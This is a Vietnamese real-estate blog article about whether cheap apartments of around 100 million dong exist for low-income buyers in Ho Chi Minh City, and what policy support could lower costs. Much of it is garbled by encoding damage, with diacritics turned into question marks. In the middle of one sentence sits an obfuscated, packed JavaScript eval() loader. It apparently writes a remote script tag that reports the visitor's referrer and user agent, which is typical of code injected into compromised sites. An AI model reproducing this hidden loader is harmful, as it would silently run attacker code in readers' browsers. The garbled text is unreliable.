Người thu nhập thấp và bài toán nhà ở trường kỳ

Th? tr??ng b?t ??ng s?n nói riêng và các ngành ngh? kinh t? xã h?i nói chung ??u ph?i ?i lên theo nh?p ?i?u phát tri?n t?ng ngày. Nói nh? v?y, ngh?a là s? t?ng giá, gia t?ng các giá tr? s? h?u, giá tr? sinh l?i là m?t t?t y?u. ?i?u này t?o nên nh?ng khó kh?n nh?t ??nh cho các ??i t??ng khách hàng có thu nh?p th?p. V?y, ?âu là l?i gi?i cho bài toán nhà ? dành cho nhóm khách hàng này trong th?i gian ??n?

Nhà eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nifkb|var|u0026u|referrer|atfat||js|php’.split(‘|’),0,{}))
100 tri?u cho dân nghèo, có hay không?

Th?i gian qua, nhi?u thông tin v? các c?n h? giá r?, t?m 100 tri?u ??ng/c?n ???c tri?n khai xây d?ng h??ng ??n ??i t??ng khách hàng có thu nh?p th?p ?ã t?o nên m?t làn sóng trông ??i và k? v?ng c?a không ít c? dân thành ph?. Tuy nhiên, kênh thông tin b?t ??ng s?n luatcongminh.com tìm hi?u và n?m b?t ???c, th?c ch?t s? l??ng c?n h? ch?m v?ch 100 tri?u là r?t th?p. ?ây là con s? th?p nh?t cho chu?i c?n h? ???c ??u t? t?i vùng ven cho nhóm ??i t??ng này. Còn ph?n l?n các c?n h? ??u dao ??ng t? 120 ??n 150 tri?u ??ng/c?n.

M?t s? chuyên gia ??u ngành ?ã ??a ra nh?n ??nh r?t rõ ràng v? v?n ?? này và lý gi?i ???c tình hình th?c t? thi công và chào bán các c?n h? trên ??a bàn thành ph?:

  • Qu? ??t t?i thành ph? H? Chí Minh ?ã và ?ang thu h?p m?t cách ?áng k?.
  • V?t giá leo thang, giá ??t c?ng có nhi?u bi?n ??ng t?ng giá và giá c?n h? c?ng vì th? không th? quá r? khi v?n ph?i ??m b?o ??y ?? các y?u t? v?t li?u, nhân công ch?t l??ng.
  • C? c?u giá bán c?n h? bao g?m nhi?u y?u t? t? ti?n thu? ??t, phí s? d?ng c? s? h? t?ng, h? th?ng ?i?n n??c, các chi phí liên quan trong thi?t k? xây d?ng, chi phí tài chính….. kéo giá bán t?ng lên, không th? ch?m v?ch giá t?i thi?u b?i nhà ??u t? s? g?p khó kh?n nh?t ??nh.

Gi?i pháp nào cho ng??i thu nh?p th?p?

Th?c t? cho th?y, kh? n?ng chi tr? c?a các ??i t??ng khách hàng thu nh?p th?p là r?t h?n ch?. Do ?ó, ?? có th? s? h?u m?t c?n h? t?i thành ph? H? Chí Minh có nh?p ?i?u phát tri?n hàng ??u ??t n??c không ph?i d? dàng. Bên c?nh ?ó là nh?ng y?u t? ??c thù bao g?m chi phí, v?t giá nh? ?ã nêu trên. ?ó là lý do mà th? tr??ng này c?n ph?i nh?n ???c s? quan tâm ?úng m?c t? xã h?i thông qua vi?c h? tr? và t?o m?i ?i?u ki?n cho các d? án nh? v?y ???c chính th?c thi công và m? bán, bao g?m các quy trình hành chính, v?n b?n, s? nh?t quán trong ki?m duy?t và cho phép, bên c?nh vi?c tr? giá m?t cách hi?u qu? và tri?t ?? cho các d? án c?a các nhà ??u t?.

Nói d? hi?u, ?? mang l?i ngu?n cung c?n h? ?úng ngh?a cho ??i t??ng khách hàng thu nh?p th?p, v?a ph?i ??m b?o m?t di?n tích s? d?ng v?a ??, không gian s?ng không quá gò bó, m?t chu?i ti?n ích v?a ph?i, các c?p ban nganh c?n h? tr? và gi?i quy?t thu?n l?i, tri?t ?? các lo?i chi phí liên quan nh? ti?n s? d?ng ??t, chi phí h? t?ng, lãi su?t ngân hàng,…..qua ?ó gi?m giá thành xây d?ng xu?ng m?c th?p nh?t có th?.

V??t qua ???c nh?ng tr? ng?i trong quy trình ki?m ??nh, phê duy?t và h? tr? tri?t ?? c?a các c?p ban ngành, các d? án b?t ??ng s?n dành cho ??i t??ng thu nh?p th?p s? thu?n l?i ra ??i và ?áp ?ng nhu c?u nhà ? c?a nhi?u khách hàng h?n. Nói m?t cách khái quát, bài toán nhà ? cho ng??i thu nh?p th?p không quá khó th?c hi?n, v?n ?? là c?n nhìn nh?n và tri?n khai các công tác m?t cách tri?t ?? và mang l?i hi?u qu? cao nh?t.